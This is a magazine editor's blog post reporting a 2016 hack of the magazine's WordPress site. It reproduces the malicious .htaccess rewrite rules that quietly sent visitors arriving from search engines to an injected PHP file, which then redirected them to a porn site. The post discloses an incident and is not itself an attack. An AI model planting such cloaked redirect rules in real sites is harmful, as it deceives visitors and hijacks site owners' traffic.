Apr 162016

Logo large

The Numéro Cinq Magazine site was hacked. The first indication I had of this came on April 13, when a friendly stranger tweeted me about some odd Google search redirects. I was a bit naive and did not quite understand the message at first. Then yesterday, April 15, a student of mine at Vermont College of Fine Arts emailed me to say he had clicked on a link and found himself looking at naked bodies. His message was enigmatic because he didn’t say what link. I checked the site and it was fine. It took me a few more minutes before I realized that he was referring to the link he got when he searched the magazine on Google Search. If you searched for NC, you got a link that said it was for NC but actually took you to a porn site. I didn’t stay on it long enough to notice the name or the content.

Once we figured out what was going on, it took my son (our brilliant tech team, also former NC contributor) Jonah about ten minutes to find and clean out the malicious code. It was in the htaccess file in the NC WordPress directory.

Here it is:

RewriteCond %{ENV:REDIRECT_STATUS} 200
RewriteRule ^ – [L]
RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]
RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)
RewriteRule ^(.*)$ blustery-annabal.php?$1 [L]

What this code did was simply redirect any search inquiries for Numéro Cinq (on Google, Yahoo, MSN, Bing, and AOL) to a wonderfully named file called “blustery-annabel” (proof that poetry has not been lost in the souls of Internet marketers). Blustery-annabel is a php file also inserted into the NC WordPress directory. It contains a lot of nonsense text and then a command that redirects to a porn site (not named in the command).

Both the malicious code and blustery-annabel had been inserted into the site’s directory from outside. As near as Jonah can figure out, it probably piggy-backed on a plugin upgrade I uploaded on or just before April 13. This is the only possible way anyone could get into the htaccess file. We’re going to be looking at the logs today to try to figure out which one. Probably, the plugin developers are unaware of the hack.

Why would someone do this? Well, it’s not as if someone specifically targeted the magazine. This kind of hack is perpetrated by an Internet bot that is out there constantly nosing around looking for entry points into WordPress sites, which have special vulnerabilities associated with plugin programs (little addon programs developed by the WordPress community or commercial developers to add extra functions WordPress left out of the original program). Basically, it’s a kind of free advertising for that porn site. Such bots infect hundreds of WordPress sites with redirects and out of all those sites and clicks and searches, a certain number of people will actually find the porn site attractive and might even pay something to join (or whatever). It’s a game of numbers and it’s all about marketing.

For sure, no one reading the magazine was ever under any threat. You would never have noticed. The only people affected were the ones who searched for NC on the search engines in question. And they only got the annoying redirect. No malicious code could have entered their computers that way.

We have neutralized the malicious code now. Though we have kept blustery-annabel because it’s a cute name (and doesn’t do any harm now). We are still trying to figure out how the code got onto the site. If we manage that we will notify the WordPress community and the plugin developer.

Thank you to our readers and interested strangers for being vigilant and letting us know that something was not right. Please keep on keeping an eye on things. You’re the best.


Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.